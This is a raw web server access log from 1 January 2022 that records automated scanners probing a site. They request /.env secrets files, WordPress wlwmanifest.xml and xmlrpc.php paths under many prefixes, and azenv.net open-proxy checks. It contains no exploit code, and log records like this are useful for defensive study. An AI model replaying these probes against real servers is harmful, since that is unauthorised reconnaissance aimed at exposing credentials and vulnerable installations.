209.141.53.74 - - [01/Jan/2022:03:58:32 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
4.28.87.68 - - [01/Jan/2022:04:00:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.28.87.68 - - [01/Jan/2022:04:00:40 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
209.141.53.74 - - [01/Jan/2022:04:01:41 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
107.172.73.224 - - [01/Jan/2022:04:05:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:48 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:48 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:49 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:50 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:50 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:05:50 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.183.214.154 - - [01/Jan/2022:04:21:13 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
54.183.214.154 - - [01/Jan/2022:04:22:40 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
45.250.66.53 - - [01/Jan/2022:04:24:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
154.89.5.82 - - [01/Jan/2022:04:24:09 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
157.245.70.127 - - [01/Jan/2022:04:24:36 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [01/Jan/2022:04:24:36 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
54.183.214.154 - - [01/Jan/2022:04:31:23 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
107.172.73.224 - - [01/Jan/2022:04:33:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:04:33:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
